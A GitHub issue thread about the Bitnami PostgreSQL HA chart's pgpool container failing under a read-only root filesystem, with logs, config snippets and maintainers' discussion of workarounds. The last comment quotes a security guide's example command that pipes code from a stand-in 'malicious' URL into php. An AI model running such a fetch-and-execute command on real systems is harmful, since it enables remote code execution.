### ISSUE TITLE
PostgreSQL HA PGPOOL container  Read-only file system ERROR

### ISSUE THREAD

**Issue by javiramos1** [bitnami/charts#8500]
**Which chart**:
PostgreSQL HA

**Describe the bug**
Permission Error when setting read only root file system `readOnlyRootFilesystem: true`.

We must set `readOnlyRootFilesystem: true` as per company policy.

**ERROR**:
```
/opt/bitnami/scripts/libpgpool.sh: line 26: cannot create temp file for here-document: Read-only file system
/opt/bitnami/scripts/libpgpool.sh: line 98: cannot create temp file for here-document: Read-only file system
/opt/bitnami/scripts/libpgpool.sh: line 107: cannot create temp file for here-document: Read-only file system
/opt/bitnami/scripts/libpgpool.sh: line 116: cannot create temp file for here-document: Read-only file system
/opt/bitnami/scripts/libpgpool.sh: line 125: cannot create temp file for here-document: Read-only file system
 11:22:19.46 
 11:22:19.46 Welcome to the Bitnami pgpool container
 11:22:19.46 Subscribe to project updates by watching https://github.com/bitnami/bitnami-docker-pgpool
 11:22:19.46 Submit issues and feature requests at https://github.com/bitnami/bitnami-docker-pgpool/issues
 11:22:19.47 
 11:22:19.47 INFO  ==> ** Starting Pgpool-II setup **
/opt/bitnami/scripts/libpgpool.sh: line 26: cannot create temp file for here-document: Read-only file system
/opt/bitnami/scripts/libpgpool.sh: line 98: cannot create temp file for here-document: Read-only file system
/opt/bitnami/scripts/libpgpool.sh: line 107: cannot create temp file for here-document: Read-only file system
/opt/bitnami/scripts/libpgpool.sh: line 116: cannot create temp file for here-document: Read-only file system
/opt/bitnami/scripts/libpgpool.sh: line 125: cannot create temp file for here-document: Read-only file system
/opt/bitnami/scripts/libldapclient.sh: line 22: cannot create temp file for here-document: Read-only file system
/opt/bitnami/scripts/libldapclient.sh: line 37: cannot create temp file for here-document: Read-only file system
 11:22:19.50 INFO  ==> Validating settings in PGPOOL_* env vars...
/opt/bitnami/scripts/libpgpool.sh: line 153: PGPOOL_SR_CHECK_PERIOD: unbound variable

```

**To Reproduce**

In the Helm chart set `readOnlyRootFilesystem: true` in the `pgpool.containerSecurityContext` section:

```
pgpool:
    containerSecurityContext:
      capabilities:
        drop:
          - all
      readOnlyRootFilesystem: true
      runAsNonRoot: true
      runAsUser: 1001
```

**Expected behavior**
PgPool startup successfully. 

**Version of Helm and Kubernetes**:

- Output of `helm version`:

```
version.BuildInfo{Version:"v3.5.2", GitCommit:"167aac70832d3a384f65f9745335e9fb40169dc2", GitTreeState:"dirty", GoVersion:"go1.15.7"}
```

- Output of `kubectl version`:

```
Client Version: version.Info{Major:"1", Minor:"18", GitVersion:"v1.18.0", GitCommit:"9e991415386e4cf155a24b1da15becaa390438d8", GitTreeState:"clean", BuildDate:"2020-03-25T14:58:59Z", GoVersion:"go1.13.8", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"19+", GitVersion:"v1.19.14-gke.1900", GitCommit:"abc4e63ae76afef74b341d2dba1892471781604f", GitTreeState:"clean", BuildDate:"2021-09-07T09:21:04Z", GoVersion:"go1.15.15b5", Compiler:"gc", Platform:"linux/amd64"}

```

**Additional context**

I think it is the same issue as this one: https://github.com/bitnami/charts/issues/5600
That happened in the Redis chart.

**Comment by rafariossaa** [comment]
Hi,
  That's is due how the pgpool initialization works, it need to create a config file dinamically and write it into `/opt/bitnami/pgpool` directory.

**Comment by javiramos1** [comment]
Thanks for the quick reply. 

Can it be done with a init container or using another folder?  or maybe use emptyDir mounted in memory.

This is the vulnerability: https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/

**Comment by rafariossaa** [comment]
I am creating a internal task to look into this an see how we can improve our charts for this.
This is not going to be a trivial task because assets have different mechanism to be configured. In ones you create a config file, in others the config file is already created and you need to tweak some parameters. So this need to be analyzed chart by chart.
We will come  back as soon as we have news.

For this case, maybe you can try mounting an emptyDir where the config files are going to be generated.

**Comment by javiramos1** [comment]
Thank you so much!

I tried to use emptyDir but it did not work:

```
pgpool 15:31:37.50 INFO  ==> Generating pg_hba.conf file...
/opt/bitnami/scripts/libpgpool.sh: line 319: /opt/bitnami/pgpool/conf/pool_hba.conf: No such file or directory
```

I think the problem is that in the same folder, there is a mix of generated and static files and mounting a volume will remove static files.

**Comment by rafariossaa** [comment]
Just in case you want to take a look to the inner of the initialization. [It is here](https://github.com/bitnami/bitnami-docker-pgpool/blob/f7153942d396bc6ce8b8bb75117129020433cf9a/4/debian-10/rootfs/opt/bitnami/scripts/libpgpool.sh#L628).

**Comment by javsalgar** [comment]
Hi,

We've been taking a look to the issue and created to PoCs

https://github.com/bitnami/charts/pull/9243
https://github.com/bitnami/charts/pull/9250

After checking, we got to this conclusion:

> readOnlyRootFilesystems could add a layer of security to our charts, but at the same time, in the case of stateful applications it is not as simple as enabling the security context. Because both the container logic and the application require write operations, we need to add emptyDir volumes so the application doesn't crash. As a consequence, the reasoning behind using readOnlyRootFilesystems (disallowing filesystem tampering) would not be applicable. What is more, the kubesec guide clearly states that just setting readOnlyRootFilesystem in this kind of applications [would not be enough ](https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/).

>> However if there are runtimes available in the container then this is not sufficient to prevent code execution. Consider curl http://malicious.php/ | php or bash -c "echo 'much pasted code'".

> Because of this, unless there's a clear business demand, I don't find much value in spending time in adding readOnlyRootFilesystem to this kind of charts.
